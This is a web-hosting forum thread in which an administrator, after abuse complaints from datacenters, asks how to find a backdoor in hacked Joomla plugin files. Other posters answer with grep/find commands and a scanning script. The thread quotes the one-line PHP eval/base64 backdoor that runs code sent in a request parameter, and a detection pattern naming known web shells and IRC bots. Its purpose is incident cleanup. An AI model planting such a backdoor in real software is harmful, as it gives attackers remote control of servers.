Results 1 to 11 of 11
  1. #1

    Find a php cod on all php files

    Hi 2 All

    I've received a few complaints from the xlhost Datacenter

    Subject : TOS Violation - Malicious Activity


    Abuse Team,
    It appears that the below IP addresses that you seem to host have been used in recent cyber attacks. We have been informed these compromises are possibly the result of a Joomla or other CMS vulnerability and if not patched will simply be re-infected.
    We request that you investigate these IP addresses to identify any malicious activity. If you are able to confirm suspicious activity, we ask that you take appropriate action to disable the malware, patch the vulnerability or remove the devices from the network. It is also likely Joomla administrative passwords where compromised and they should be changed to prevent re-infection.
    All IPs/URLs have been confirmed as active just prior to this notification being sent. If you feel action has already been taken, please reconfirm by viewing the HTTP status with a tool like wget or cURL. If using cURL, use the following command:
    curl -A “Mozilla/4.0” -iL
    Please note the HTTP status in the first line of output, if the first line of output is 'HTTP/1.1 200 OK', that means the file exists, despite any other output in consequent lines.
    Thank you for your immediate attention and action. Please contact us as soon as you receive this and stay in contact until any issues have been resolved. Additional technical details are provided below.
    Regards,
    Abuse Team
    Bank of America

    *********************************************************************************************************************************
    Examples of Malicious Content
    *********************************************************************************************************************************
    Malicious content:
    xxx.xxx.xxx.xxx /plugins/system/dvmessages.php,

    This site is joomla 1.5

    I've checked the dvmessages.php file

    file Was attached haced file.php file

    I examined a normal dvmessages.php file

    file Was attached normal file.php file

    Differences between two files by hacking the code below
    defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));

    i want search this code defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id']))); all users php file to /home folder

    please help me

    Thanks All
    Attached Files Attached Files

  2. #2
    Hello Friend,

    To find a specific content in different files in a directory, you can use the below command. This command will give a list of files that contains "JEXEC" along with the path to the files.

    grep -irl JEXEC /home

    You can replace the search content with JEXEC and search.

    You can also search like "defined( '_JEXEC' )" ie within "" if its contains spaces.

    Please try.

  3. #3
    Hello
    I want know XLHost how can find it? please contact and question with theme.
    May be theme have finder for this files.
    Thank you

  4. #4
    To search all the files of all accounts on the server, use the below command:

    for i in `cat /etc/trueuserdomains | awk '{print $2}'`; do grep -l "eval(base64_decode($_REQUEST" /home/$i/public_html/* -R; done;
    | LinuxHostingSupport.net
    | Server Setup | Security | Optimization | Troubleshooting | Server Migration
    | Monthly and Task basis services.
    | MSN : madaboutlinux[at]hotmail.com | Skype : madaboutlinux

  5. #5
    Quote Originally Posted by madaboutlinux View Post
    To search all the files of all accounts on the server, use the below command:
    Thank you madaboutlinux
    This code work at cpanel
    i want search to directadmin panel

    best regurds

  6. #6
    Join Date
    May 2012
    Location
    India
    Posts
    760
    try this,
    find /home/ -type f -name \*.php -exec grep -il "eval(base64_decode($_REQUEST" {} \;
    Kevin Cheri : Freelance Linux Admin 8+ Exp, reach me out for any help
    Skype : lynxmaestro
    Gmail : cheri.kevin@gmail.com

  7. #7
    Join Date
    Aug 2010
    Location
    /bin/bash
    Posts
    123
    You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

    #!/bin/bash
    pattern='r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|deface|defacing|defacer|MSRml'
    searchpath=/home/*
    find $searchpath \( -regex '.*\.php$' -o -regex '.*\.cgi$' -o -regex '.*\.inc$' -o -regex '.*\.pl' \) -print0 | xargs -0 egrep -il "$pattern" /dev/null | sort >> report.$$
    cat report.$$
    Cheers!!!
    When all else fails ... Read the documentation!!!


  8. #8
    Quote Originally Posted by gnulinuxexpert View Post
    You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

    #!/bin/bash
    pattern='r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|deface|defacing|defacer|MSRml'
    searchpath=/home/*
    find $searchpath \( -regex '.*\.php$' -o -regex '.*\.cgi$' -o -regex '.*\.inc$' -o -regex '.*\.pl' \) -print0 | xargs -0 egrep -il "$pattern" /dev/null | sort >> report.$$
    cat report.$$
    Cheers!!!
    Hello

    Where can use this?
    copy in .sh file and run it?
    Receive mail from my data center about this problem.

    Dear Sir or Madam,

    We have received spam/abuse notification. Please take the necessary
    steps to prevent this from happening again in future.

    Furthermore, we would request that you provide both ourselves and the
    person who has submitted this complaint with a short statement within
    24 hours. This statement should include details of the events leading
    up to the incident and the steps you are taking to deal with it.

    Next steps:
    - Solve the problem
    - Send your statement to us: Please use the following link for this: http://abuse.hetzner.de/ [link repley to abuse]
    - Send your statement to the person making the complaint per email

    The details will then be checked by a colleague, who will coordinate
    further proceedings. In the event of several complaints, this may
    lead to the server being locked.

    Important information:
    When replying to us, please leave the Abuse ID [AbuseID:000000] in
    the subject line unchanged.


    Kind regards,

    Sandra Betz

    Hetzner Online AG
    Stuttgarter Straße 1
    91710 Gunzenhausen
    Tel: + 49 (0)9831 610061
    Fax: + 49 (0)9831 61006-2
    abuse@hetzner.de
    www.hetzner.com

    Register Court: Registergericht Ansbach, HRB 3204
    Management Board: Dipl. Ing. (FH) Martin Hetzner
    Chairwoman of the Supervisory Board: Diana Rothhan

    ----- attachment -----

    Dear Hetzner Abuse Team,

    We have been informed of web servers in Germany which were apparently
    compromised and are participating in DDoS attacks. Below is the list of
    servers that are in your network area. The URL points to scripts that
    have apparently been uploaded onto the servers by the attacker.

    ----- log file -----

    IP: my server ip

    Script(s):

    http://domain1.com/plugins/system/dvmessages.php
    http://domain2.com/plugins/system/dvmessages.php
    Thank you

  9. #9
    Join Date
    Aug 2010
    Location
    /bin/bash
    Posts
    123
    Hi,

    First of all you should disable the following files. Or your DC will suspend your server.

    http://domain1.com/plugins/system/dvmessages.php
    http://domain2.com/plugins/system/dvmessages.php

    This dvmessages.php seems to be infected and its a part of Joomla plugin. Check the access log for the ip's that accessed the php file and block it. Would be better to suspend the account and reactivate only after updating the Joomla/plugin. Update DC that you have disabled the files, blocked ip's and disabled the website and will enable it only after updating the outdated plugins.

    You may check similar files like dvmessages.php using the following command.

    updatedb
    locate dvmessages.php
    Check the output and review the files to see if any is infected.

    If you are not sure about this, I would recommend you to hire an administrator who know about this.

    For executing the script, just create a file named scan.sh and copy paste the script contents.

    Save it.

    Provide execute permission using the following.

    chmod +x scan.sh
    Run it using

    ./scan.sh
    Make sure to add the particular pattern you found in dvmessages.php so the script will scan that pattern as well.

    Cheers!!!
    When all else fails ... Read the documentation!!!


  10. #10
    Join Date
    Sep 2008
    Location
    Sweden
    Posts
    1,242
    Quote Originally Posted by gnulinuxexpert View Post
    You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.



    Cheers!!!
    c99 files codded by base 64 or ioncube
    none of new c99 shell file are release with main open code

  11. #11
    Quote Originally Posted by gnulinuxexpert View Post
    You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.



    Cheers!!!
    Hi

    how can create a .sh for search whit code

    for i in `cat /etc/trueuserdomains | awk '{print $2}'`; do grep -l "eval(base64_decode($_REQUEST" /home/$i/public_html/* -R; done;

    and save All results and move finde file to another directory sampel path /home/Quarantine

    when find .sh file search and file and move to another folder and report scan results

    Thank you

  12. Newsletters

    Subscribe Now & Get The WHT Quick Start Guide!

Similar Threads

  1. Replies: 9
    Last Post: 02-10-2013, 02:58 AM
  2. Looking for a web host that support .cod and .jad files!
    By ElFlammable in forum Web Hosting
    Replies: 10
    Last Post: 11-21-2011, 08:17 AM
  3. PHP script to convert Video files to Flash files
    By DelPierro in forum Programming Discussion
    Replies: 12
    Last Post: 02-02-2011, 03:22 AM
  4. when php fails dont send php files - apache config
    By nand in forum Hosting Security and Technology
    Replies: 2
    Last Post: 09-24-2005, 04:02 PM
  5. php & txt files, how can I edit txt files using php?
    By dpny in forum Programming Discussion
    Replies: 13
    Last Post: 12-27-2003, 08:08 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •